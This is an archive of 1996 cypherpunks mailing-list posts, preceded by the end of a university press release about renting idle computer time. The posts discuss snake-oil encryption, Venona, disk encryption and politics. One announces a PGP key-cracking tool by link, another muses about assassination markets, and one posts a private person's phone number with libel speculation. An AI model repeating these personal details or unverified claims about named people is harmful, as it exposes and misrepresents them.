There is money to be earned, Awerbuch says, by tapping the enormous power
that lies dormant while computer owners are asleep, at lunch or merely
away from their terminals.  At such times, these computers could earn
extra cash by doing remote work for researchers or business owners in
other locations. People who need extra computing horsepower or special
equipment for a one-time project will line up to lease time on these idle
machines, Awerbuch believes, because renting someone else's computer costs
far less than buying a new one. 

"It makes huge economic sense," Awerbuch says. "For example, if once in a
lifetime you want to use a fancy program that only runs on a particular
piece of hardware, why do you need to buy this piece of hardware? Instead,
you could lease a cycle on that machine in exchange for some economic
favor. The opportunities are endless." 

Most of the technology to share hardware over telephone lines or some
other network already exists.  What's needed, the researcher says, is a
system for buying and selling cycles of time on idle machines, along with
safeguards to make sure "renters" can't pry into an owner's files. It will
also require a change in the close attachment most people feel toward
their computers. 

"People are accustomed to using only the machines that they've purchased," 
Awerbuch says. "They're not used to using machines that are not their own.
Yet it seems silly to invest lots of money to buy more computing power
when all you have to do is utilize what's already out there. Think of it
this way: 90 percent of the computing power in the world is inaccessible
to people, simply because we haven't set up the right mechanism to help
one another." 

Here's how that mechanism might work, Awerbuch says: An accountant owns a
PC. It crunches numbers perfectly but can't handle the elaborate graphic
design work needed to create a splashy business brochure. The accountant
posts a note on the Internet, offering 50 cents a minute any time that
week for remote use of a Macintosh computer with graphics software. If the
brochure is needed within the next hour or two, the accountant might offer
$5 a minute for immediate access. A Macintosh owner, or an unattended
machine that searches the Internet for work whenever it is idle, responds.
The accountant takes temporary control over the Mac terminal, which might
be located anywhere in the world. When the project is completed, the
accountant issues an electronic payment for the time. 

This same system could allow a hospital to lease time on powerful
computers elsewhere for demanding jobs such a medical imaging. Other
companies could break complex tasks into small pieces, then farm them to
small outside computers. Hardware owners could also post notices on the
Internet, describing their machines, hours of availability, memory
capacity and software. 

People who are reluctant to loan their lawn mower to a neighbor may be
even less inclined to let perfect strangers use their computers by remote
control. But Awerbuch believes these transactions can be sound and
profitable. 

"This sharing should not be viewed as an altruistic thing, nor as some
kind of a Communist idea, where you don't own anything personally and you
must share with other people,"  he says. "To the contrary, this is purely
an entrepreneurial arrangement, where you trade what you own in exchange
for cash or some other economic benefit. The policies and approaches will
be totally up to the individuals or companies or whoever is doing it. It
could be quite interesting to see this electronic marketplace in action." 

This research, by Awerbuch and co-principal investigator Yair Amir,
assistant professor of computer science at Hopkins, is funded entirely by
a $1 million three-year federal grant from the Advanced Research Project
Agency, Technology Management Office. 

Johns Hopkins University news releases can be found on the World Wide Web
at http://www.jhu.edu/news_info/news/

In addition, Johns Hopkins University science and medical news releases
can be accessed on-line through the following services: 

CompuServe in the SciNews-MedNews library of the Journalism Forum under
file extensions ".JHM" or ".JHU"; also in NASW Online in the same forum. 

Quadnet: send email to: scitech@quadnet.vyne.com. In the body of the
message type "info Quadnet." 

EurekAlert! at http://www.eurekalert.org 



							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Prisoner <nul@void.gov>
Date: Tue, 27 Aug 1996 16:54:35 +0800
To: cypherpunks@toad.com
Subject: Re: The POUCH
In-Reply-To: <Pine.SUN.3.94.960827002927.6637D-100000@polaris>
Message-ID: <32229A88.5F7E@void.gov>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On 26 Aug 1996, JOHN E. HOLT wrote:
> 
> > The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
> > vector and the CBC technique.  Most experts agree that such an implementation is highly resistant to all forms of cryptographic attack.
> > Hellman and Dilfie rely on knowing the algorithm for their known plain text attacks
> > An unpublished algorithm forces them into reverse engineering the computer
> > programs to learn the algorithm. The POUCH has many roadblocks built in
> > to prevent this.

There's another live one on sci.crypt, about "market leader" Genio USA; some good chuckles there.
Check out http://www.geniousa.com/genio/

Where's that snakeoil FAQ?  Any progress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 27 Aug 1996 17:20:53 +0800
To: Jim Ray <liberty@gate.net>
Subject: [noise] Re: Cypherpunk voting - ITAR or CDA
Message-ID: <3.0b11.32.19960826233512.00bb673c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray wrote:
>If the Republican candidate had been Forbes, there might have been a "don't 
>let the great be the enemy of the good" argument against voting 
>Libertarian.

If Forbes was the current Republican canidate, the nation would be spending
itself into debt dealing with all of the therapy bills resulting from their
childrens minds being irreversably damaged from looking at the Forbe's smile
on the news every night.  Forbes looks to me like H.P. Lovecraft tried to
design a cannidate.  What Eldrich bargains has he made to get to any sort of
public acceptance with a smile like that?

> As it stands now, Dole is, at best, arguably the "lesser of 2 
>evils," which still comes out evil in my book. As the designated partisan 
>Libertarian on the list, I urge all cypherpunks to vote their consciences 
>and pick Harry Browne and Jo Jorgensen. The mere fact that the media is 
>[grudgingly] covering us suggests we are finally doing something right, and 
>Harry is winning many Internet polls despite much fawning, hopeful coverage 
>for the big-eared billionaire hypocrite stealth-candidate, who has no 
>position but certainly would enjoy having the TLAs investigate his enemies.

I have seen little to no coverage of the Libretarians this (or any) year.
And even less coverage than usual now that they have a canidate who is even
worth voting for.  (I guess I won't vote for Pat Paulsen after all...)

As for the Perotbots...  Maybe someone should tell them what "perot" means
in French.

>I fully accept that it is likely Dole or Clinton will win, but I think it 
>will fill an important cypherpunk goal if the Libertarian Party candidates 
>get a vote large enough to be the margin of victory, and I will be very 
>proud of my vote, no matter who wins this election. Vote your consciences 
>for your own sake, and the sake of the children who will inherit the debt 
>of the irresponsible statists in power now.

And if Dole wins and dies in office, they could just pickle him and no one
would notice.  It would not be the first time we had a dill-dole running the
country.
---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 27 Aug 1996 15:44:18 +0800
To: cypherpunks@toad.com
Subject: pgpcrack v0.99b
Message-ID: <Pine.LNX.3.95.960827000916.166A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've finally gotten around to adding secret key cracking support to pgpcrack.
There also have been a few minor code changes to speed things up a bit.  The
source and cooresponding signature are located at
http://www.voicenet.com/~markm/pgpcrack.html.  Bug reports and suggestions are,
as always, welcome.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMiJ0WCzIPc7jvyFpAQGaKAgAg5x5U26uy1JJYv2lVKSHItFYOuTVa+qL
EBL39NsscrZCuPSYmmm75AgjBJFR4giQ9mDA4QYvxg7Es1O7guX9oq5NHGowLGHH
uJblF2pA6T+faQto3oJ0sVLJ4EyekRW0tZWz+TjIUO/c9ijWnciXJuIZ8YAJJRHO
2la92IFiy9d6hab2p7lvQn6MOB0mHjioS1iWvOTaqHpkpjRQm5GSbWA7Hx913LeE
sAZM4FkI+KyujaatbuDjpemZ9R04BOmE4aDHuDY3TYAThWUz9sFpQuB8a0fe6Gwi
GupMq1dsovbmtO7AOKeoo7l4va/0l6Pmji5/5cInKHftNbE+1sHaTg==
=nxzL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 27 Aug 1996 14:21:03 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: NSA's Venona Intercepts
In-Reply-To: <199608262018.NAA02361@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.94.960827002525.6637B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996, Bill Frantz wrote:

> At 10:49 AM 8/26/96 -0600, Rick Smith wrote:
> >One question that I haven't found answered in my perusals of the site is a
> >definitive statement of the cryptographic technology used by the Soviets.
> 
> I haven't revisited the site to check, but I distinctly remember a
> statement to the effect that the system was a one time pad system. 
> However, due to a mistake somewhere in the chain, some of the one time pads
> were used twice.  The resulting two time pad system gave NSA the wedge they
> needed to recover what they have.

I seem to recall an exhibit on Verona including a proported Soviet OTP at
the National Cryptologic Museum in MD.

> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
> (408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
> frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 27 Aug 1996 14:36:39 +0800
To: "JOHN E. HOLT" <76473.1732@compuserve.com>
Subject: Re: The POUCH
In-Reply-To: <960826234448_76473.1732_BHT119-3@CompuServe.COM>
Message-ID: <Pine.SUN.3.94.960827002927.6637D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Aug 1996, JOHN E. HOLT wrote:

> The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
> vector and the CBC technique.  Most experts agree that such an implementation is highly resistant to all forms of cryptographic attack.
> Hellman and Dilfie rely on knowing the algorithm for their known plain text attacks
> An unpublished algorithm forces them into reverse engineering the computer
> programs to learn the algorithm. The POUCH has many roadblocks built in
> to prevent this.
> I refer to Cummings, Cryptography and Data Security pages 150 and 98 in this regard.
> John Holt

Yes fine, but with an untested algorithm how do you propose to provide for
peer review, or do you propose that the authors of "The Pouch" are too
expert to need/require the input of fellow professionals?

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Aug 1996 19:32:51 +0800
To: cypherpunks@toad.com
Subject: Re: [noise]Re: The grey lady puts on some boots and rides a horseman or two...
Message-ID: <199608270848.BAA04297@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Another interesting connection is that John Aristotle Phillips
is the former Princeton student who designed an atom bomb
as his junior physics project.  (He wasn't a brilliant physicist -
he was trying to save his grade point average by doing a good paper :-)
Senator Feinstein, of course, is a leader in the "Bomb Info Off Lists"
movement....

At 07:45 AM 8/22/96 -0700, Declan wrote:
...
>I met Polly's father at the "Kids off Lists" press conference in front of
>the Capitol in June. He's an irascable fellow, and there's more to the
>story than you might think at first. 
...
>http://www.muckraker.com/muckraker/96/24/index3a.html
....
>The report drove Representative Bob Franks (R-New Jersey) and Senator
>Dianne Feinstein (D-California) to introduce the "Children's Privacy
>Protection and Parental Empowerment Act." The idea is to keep kids'
>names off direct marketing lists. It's a good concept, but it's short
>on focus and long on fear - the fear that gathering such information
>can lead to child abuse or worse.
......
>But there's a subplot here. The actual driving force and financial
>backer of KOL is John Phillips, who runs Aristotle Publishing, a
>political software company in Washington, DC. Phillips, as it turns
>out, has been in a kind of run-and-shoot legal battle with Donnelley
>for the past five years, according to an article in the Washington City
>Paper, an alternative weekly published in DC.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 27 Aug 1996 17:12:13 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: libelous action
In-Reply-To: <199608270229.WAA27445@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.94.960827023435.12189B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996, Perry E. Metzger wrote:

> 
> Mr. Curtin;
> 
> You are too kind. I suspect that 'The Pouch' is a piece of junk,
> although the lack of public disclosure makes it impossible to
> demonstrate that. If Mr. Holt would like to sue me, he's invited
> to. I'm sure he'll be at least as likely to follow up as Karl
> Denninger or "Dr." Fred C. Cohen.
> 
> Perry
> 
> C Matthew Curtin writes:
> > JOHN> Dear Mr. Curtin 
> > JOHN> Your statements about myself and my product, The
> > JOHN> POUCH are defamatory.  Since they have been made in writing and
> > JOHN> shown to and seen by other parties on the Internet, they
> > JOHN> constitute libel. Please admit to all parties that you have no
> > JOHN> personal knowledge of my product capabilities or my personal
> > JOHN> character or reputation.  Failure to do so at once will result
> > JOHN> in legal action against you personally and Megasoft.
> [...]
> > I, speaking only on behalf of myself, stand by this statement. I do
> > not apologize for my comments. If you, Mr. Holt, feel that this is a
> > personal attack against you, I regret that you've misunderstood the
> > tone and nature of my post. My statement is hardly libelous; I simply
> > observed that if your product is truly secure, there is no means by
> > which security experts can verify such claims.

As an attorney I can say that not only would I happily represent anyone
Mr. Holt sued for libel, but I would consider my contingency fee a free
lunch.  I wouldn't even bother preparing for the pre-trial hearing.

Truth, afterall, is an absolute defense to libel.

Your threat to sue is, clearly, merely an attempt to stifle any effort to
criticize your product.

I believe a more accurate legal view is that you are committing fraud by
misrepresenting "The Pouch" as a more potent implementation than it really
is.

You state:

> The Pouch uses a 64 x 64 block product cipher, a 1024 bit random
> initialization vector and the CBC technique.  Most experts agree that
> such an implementation is highly resistant to all forms of cryptographic
> attack.

This position has been refuted by at least one expert on this list.

I would remind you that each and every sale you make of this product, when
based on material misrepresentation, constitutes a fraud.  If made by
wire, as these sales seem they may, they represent wire fraud.  That's one
count of fraud and one count of wire fraud.  If a check is sent to you via
mail, that's a count of mail fraud to boot.

As you have been warned now of the flaws in your system, I don't think you
have much of a defense unless you can produce some experts to support your
own view of the cipher.  I won't hold my breath.

I am constantly amazed that people advertize new crypto products on this
list and then whine when they are literally decimated as to their
technical merit.

Go sell to children if your product can't stand the intelligence of
adults.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Wed, 28 Aug 1996 06:39:50 +0800
Subject: "The Observer" calls the internet a child pornography ring
In-Reply-To: <152310Z18071996@anon.penet.fi>
Message-ID: <199608272004.NAA15842@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Banner Front page headline in the British Observer, Sunday 25th

"The Peddlers of child abuse"
see http://scallywag.com/

The internet is presented as a conspiracy by child molesters.

There is a picture of Johan Helsingius, the man who free of charge
provides an anonymous remailer service:  The picture is captioned "The
internet middle man who handles 90% of all child pornography"  He is
represented as personally profiting from the distribution of child
pornography, though in fact no posts to binary newsgroups can go
through his system, and no large binaries can go through his system,
and he provides the anonymising service free of charge.

There is a picture of Clive Feather, the man who runs the largest
internet service provider in Britain, captioned "The school governor
who sells access to photos of child rape"]]

The observer article savagely demonizes all who use the internet,
presenting it as primarily existing for the purpose of distributing
child pornography, and demonizes and libels by name those who have
sought to defend the liberty of netizens.

I urge you all to check out this article, and send snail mail letters
to the observer condemning (since they are obviously too low tech to
read email) and email letters of support to those netizens who have
been savagely libeled for their defence of liberty.
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Wed, 28 Aug 1996 07:18:45 +0800
Subject: "The Observer" calls the internet a child pornography ring
In-Reply-To: <152310Z18071996@anon.penet.fi>
Message-ID: <199608272015.NAA28383@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Banner Front page headline in the British Observer, Sunday 25th

"The Peddlers of child abuse"
see http://scallywag.com/

The internet is presented as a conspiracy by child molesters.

There is a picture of Johan Helsingius, the man who free of charge
provides an anonymous remailer service:  The picture is captioned "The
internet middle man who handles 90% of all child pornography"  He is
represented as personally profiting from the distribution of child
pornography, though in fact no posts to binary newsgroups can go
through his system, and no large binaries can go through his system,
and he provides the anonymising service free of charge.

There is a picture of Clive Feather, the man who runs the largest
internet service provider in Britain, captioned "The school governor
who sells access to photos of child rape"]]

The observer article savagely demonizes all who use the internet,
presenting it as primarily existing for the purpose of distributing
child pornography, and demonizes and libels by name those who have
sought to defend the liberty of netizens.

I urge you all to check out this article, and send snail mail letters
to the observer condemning (since they are obviously too low tech to
read email) and email letters of support to those netizens who have
been savagely libeled for their defence of liberty.
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Wed, 28 Aug 1996 01:38:19 +0800
To: drifter@c2.net (Drifter)
Subject: Re: File System Encryption
In-Reply-To: <3221922d.3171340@c2.org>
Message-ID: <199608271401.JAA04116@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm aware of the three main disk encryption programs SFS, SECDRV, and
> SECDEV, but I need to find a solution that works with Windows 95 32bit
> or Windows NT 4.0.
> 
> I'm currently using SFS 1.17 and Secure Drive under Win-95, but am
> unable to continue to work in dos compatability mode due to severe
> performance hits.  I am open to commercial products that have passed
> peer review, but know of none.
> 
> If anyone could suggest a solution (outside of switching OS's), I
> would be *most* gratefull.
> 
> Please respond to the list, as I am a subscriber under another
> account.

If you have another 386 or 486 lying around, you could install Linux and
Ian's encrypted loopback code on a remote box, then NFS or Samba the
filesystem over.  For protection, you could modify the vlock command to
lock the console (and not unlock it), and disable inetd.  Then, unless
someone has the permissions to access the files through the network, the
files are inaccessable ;-).

> 
> The Drifter
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 27 Aug 1996 17:23:02 +0800
To: cypherpunks@toad.com
Subject: cryptocd grabbing material
Message-ID: <9608270702.AA28238@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 27 09:01:57 1996
If anyone out there knows of anything I should (and am allowed to) put on 
the cryptocd (check www.rpini.com/crypto/cryptocd.html), let me know.

If anyone out there knows of anything I MUSTN'T put on the cryptocd (due to 
copyright, law or whatsnot), let me know also.

Thanks,

Remo Pini

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMiKdZhFhy5sz+bTpAQEg9gf9EY+SvhGMW1iKB+2U0JVNs3zDqGPNkYpJ
zM9WW2oxTtTWn4znjMTXWEVAbGzmdZCkmgHsN3tFWwkWxIYxXrfFcInPNqCzxcXG
DZHcQ2nNkH1MOnQ0Wzp9l9riz8TBCzbZNtJsPoVKMup6qAGLV6ninCrAKBGaQJmY
1KR3yez3OVq04SkRXUjXKQRjwtKH2OWmZfzSormEwphHvjgE0nPJhLB9gnVDevTw
lSY3YP2NBPtIlaJbxohkvro8Mm+FGIk2vVoOY6cXwFcpZWONtyiwZPiYQzFfcOzw
yjbIzGU8qU5MH58MeS/wZuTVzHhtmRl7lCLYS2xPH73ZpgvUh3ZDsw==
=LGSU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 28 Aug 1996 04:23:54 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re:Edited Edupage, 18 Aug 1996 [SATELLITES]
Message-ID: <199608271609.JAA12761@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 PM 8/26/96 -0700, Bill Stewart wrote:
>At 12:35 AM 8/21/96 -0800, mccoy@communities.com (Jim McCoy) wrote:
>>You want to avoid moving parts like the plague in orbit.  They eventually
>>wear out or fail and once that happens you have a very expensive piece of
>>junk in orbit.  Solid-state storage is the _only_ way to go if you want to
>>avoid things like neding to pressurize the drive (eliminating any cost
>>advantage over solid-state.) 
>
>Why do you need to pressurize the drive?  Most hard disk drives
>for the last N years have been airtight sealed containers,
>haven't they?  (Removables are different, of course.)

While I haven't looked at the more recent ones closely, most hard drives have an ultra-fine (<0.1 um particles?) filter element separating "inside" from "outside."  It allows air to pass to equalize pressure and humidity, while keeping out the dust.  (it is probably made of the same kind of material that is used, internally, as a filter for the airflow within the drive.)

Even if they didn't, there is a big difference between an enclosure that's good enough to hold a hard disk on earth, and one which can spend N-years in a high vacuum yet maintain enough air to run a hard drive.

>
>I'd worry far more about the stresses of launch bothering
>the drives.

That's not a problem at all.  Most modern drives are rated for 10's of G's, non-operating.  Satellite launches are probably a breeze compared to this.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 27 Aug 1996 17:35:02 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608270711.JAA08793@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996, Geoffrey Gussis wrote:

> Overall, I am quite surprised that there isn't a whistleblowing
> clearinghouse on the Internet; a site sponsored by a non-profit that lists
> email addresses and secure forms for sending anonymized email to those
> areas of the public and private sector that deal with whistleblowing.  As
> the Internet is a great medium for information dissemination, and offers
> significant privacy advantages, I really expected to find much more.

http://www.greatworld.com/ Used to have a whole pile of web accessable 
databases dealing with political corruption, crooked cops, government waste, 
and a database of alleged child molesters...  I beleive the site had to be 
shut down due to massive abuse, though.  The sponsor of the site was/is a 
guy named Tony Gatlin, his phone number was/is 615-859-3710. The company he 
worked for was/is called Self Test Software (selftestsoftware.com), but 
the company web page is defunct now as well. I'm guessing a massive libel suit
led to his untimely dissapearance from the net, but i could be wrong.. 

I'd say that he could probably contribute a paragraph or two on the 
problems facing people who try to engage in "whistle-blowing" on the net,
and could give a few good reasons why you aren't finding more services 
dealing with this sort of thing. Anonymity is great, if you really have 
something to say, but unfortunately for many people anonymity is nothing 
but a tool to injure others with impunity.



"Peaceful confrontation, meet war machine."   -Slayer
  "This time, I'm voting with a bullet."      -Corrosion of Conformity





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Scher <strange@tezcat.com>
Date: Wed, 28 Aug 1996 01:30:03 +0800
To: Cypherpunks <best-of-security@suburbia.net
Subject: Re: BoS: Nuke attack? No, bug in DNS! (fwd)
In-Reply-To: <199605160122.BAA00187@fountainhead.net>
Message-ID: <Pine.SUN.3.95.960827090758.12072B-100000@xochi.tezcat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 May 1996, Vipul Ved Prakash wrote:

> I think this is the main cause of all strange things happening on the
> net for last few days. 
[quoting q quote of Karl Denninger:]
> > > There are a series of bad nameserver records floating around on the net
> > > which are blowing up BIND versions 4.9.4 (REL and T5B) and possibly other
> > > releases as well.  

My employer experienced this problem -- I thought it was related to the
cashe clearing problem in 4.9.4 on some platforms and upgraded to 4.9.4P1
(FreeBSD 2.1.0) -- which appears to have solved the problem for us. 

info-sys.home.vix.com:/pub/bind/release/4.9.4/bind-4.9.4-P1.tar.gz

Not sure if it -really- fixes the problem or if we've been lucky since.

      -M

Michael Brian Scher   (MS683)   | Anthropologist, Attorney, Part-Time Guru
http://www.tezcat.com/~strange/ |          strange@cultural.com
strange@tezcat.com              |       mbscher@midway.uchicago.edu
   I'm a legal anthropologist; what's an illegal anthropologist?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Wed, 28 Aug 1996 00:14:58 +0800
To: smith@sctc.com
Subject: Re: NSA's Venona Intercepts
Message-ID: <199608271315.JAA10821@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


it is my understanding that the Venona traffic used a code book with super-
encyption using a otp.  the break was possible because the Soviet's got
sloppy with the otp keys and in fact used some of them more than once. 
even then, it tooks years of work to make the breaks.  everything you ever
heard about using true random keys, and only once is true.  difficult as it
may be to accomplish,  it is possible to break a otp if the pad isn't really
'one time'.

	-paul

> From cypherpunks-errors@toad.com Mon Aug 26 18:14:44 1996
> X-Sender: smith@mailhost.sctc.com
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Mon, 26 Aug 1996 10:49:39 -0600
> To: cypherpunks@toad.com
> From: smith@sctc.com (Rick Smith)
> Subject: NSA's Venona Intercepts
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1510
> 
> The bulk of the material available from NSA's web site is associated with a
> long time project called Venona to decrypt Soviet message traffic from the
> 1940s. It's an interesting exhibition of the practical output of
> cryptanalysis that, incidentally, contains alleged reference to famous
> Commie spies of that era (Hiss, the Rosenbergs, etc).
> 
> One question that I haven't found answered in my perusals of the site is a
> definitive statement of the cryptographic technology used by the Soviets. I
> was re-reading Kahn's 1967 chapter on Soviet crypto and he claimed that
> they relied primarily on one time pads. In fact, he was pretty specific
> about them using OTPs for exactly the type of traffic appearing in the
> Venona archive. But when I look at the partial decrypts in the Venona
> archive I don't understand how you'd get such partial decrypts from OTPs.
> 
> The intercepts seem to indicate the use of ciphers with some codewords
> weakly layerd on top. Some intercepts show translations based on the
> phonetic properties of the extracted Russian plaintext. So I don't think
> the "unrecovered codegroups" are caused by a classic code that substitutes
> tokens for word meanings. But you're not going to crack only part of a OTP
> ciphertext -- presumably you'd need a compromised key tape, and that would
> either decrypt everything or nothing.
> 
> So they were either really using rotor machines or they were using
> something else. Any other ideas? Other references?
> 
> Rick.
> smith@sctc.com          secure computing corporation
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve O <privsoft@ix.netcom.com>
Date: Wed, 28 Aug 1996 04:22:40 +0800
To: cypherpunks@toad.com
Subject: FYI: GOP's Stolen Laptop...
Message-ID: <1.5.4.16.19960827112653.295f6afc@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI:

Front page of the New Jersey Star Ladger:

"GOP's Stolen Laptop had credit card Details"

NJ Republicans' convention info and card card numbers and info was on the
laptop insecurely, a letter went oput to the NJ Republican committee
informing them of the 'inconveince'. Several key Rebulican Reps' cards were
among those stolen including: Dick ZImmer and Christopher Smith as well as
the State Committee's credit card. etc...
 
"True Utopia can only be reached by an uncensored and secure Internet,
	True Chaos can only be reached by the government,
		True love can only be reached in the movies."
S.O.

"Bang your head, Metal Health will drive you mad!"
Quiet Riot


"Welcome my friend, Welcome to The Machine"
Pink Floyd


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzHF2iIAAAEEAKw9QZ8yNG0X1YOGvaYeLaOQphDSEFYxelYED8a4YKoxnHuX
Wd7CPKXBS6Bhx9uGFpNa/7Km33TfhzJhuolHPb60upBIsNTdrkzVlSYyiE0aWuFt
EORVWEG6Rmy9w2yZ8obQAIx9aAy7h1wDi2mdSrDH+rPBw0pXelhDCiQ5KnJpAAUR
tCBTdGV2ZSBPIDxwcml2c29mdEBpeC5uZXRjb20uY29tPg==
=J4Tk
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Wed, 28 Aug 1996 05:40:35 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
In-Reply-To: <Pine.3.89.9608260847.A346-0100000@pegasus.unicorn.com>
Message-ID: <9608271647.AA22569@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


> Would anyone out there be interested in helping set up a 
> crypto-anarcho-capitalist MUD to play around with some of the social 
> aspects of crypto-anarchy and anarcho-capitalism? I can probably hack 
> together a basic lpmud in a month or two if someone has a machine which 
> it could run on and which could run a mailing list for those involved. 

I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
I just don't have enough coded to be worth announcing yet.

Which cryptographic primitives should be coded in initially?

Obvious choices are:

Pseudonyms
Anonymous digital cash (issued by any pseudonym, not just "banks")
Public and private keys
Secret sharing
Anonymous broadcast & message pools
Anonymous markets

(ref: Tim May's sig)

What am I missing?  Should there be direct support for Jim Bell's
assasination markets?  It'd provide a means of demonstrating its
ineffectiveness as a means of social control.

I think that for purposes of simulation, it's reasonable to model
cryptographic primitives in a "Trust the server" mode, because you
need to trust the MUD server anyway (unlike a government), and it
puts a much lower load on the CPU.

There's also the question of log policy.  Having run a MUD for a few
years, I want to keep logs for bug detection.  A declared policy that
they aren't released for n years would work though.  Opinions, anyone?

[snip]
> Please send replies to me directly as I'm travelling and consequently off 
> the list. Looks like I'll be on a mad bus trip round New Zealand for most 
> of next month so Net access will be erratic.

Sent to Cypherpunks as well, in case anyone else is interested.

> 	Mark
 
Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Wed, 28 Aug 1996 02:03:09 +0800
To: Black Unicorn <frantz@netcom.com>
Subject: Re: NSA's Venona Intercepts
Message-ID: <v01540b0fae48c44b87ff@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 AM 8/27/96, Black Unicorn wrote:

>I seem to recall an exhibit on Verona including a proported Soviet OTP at
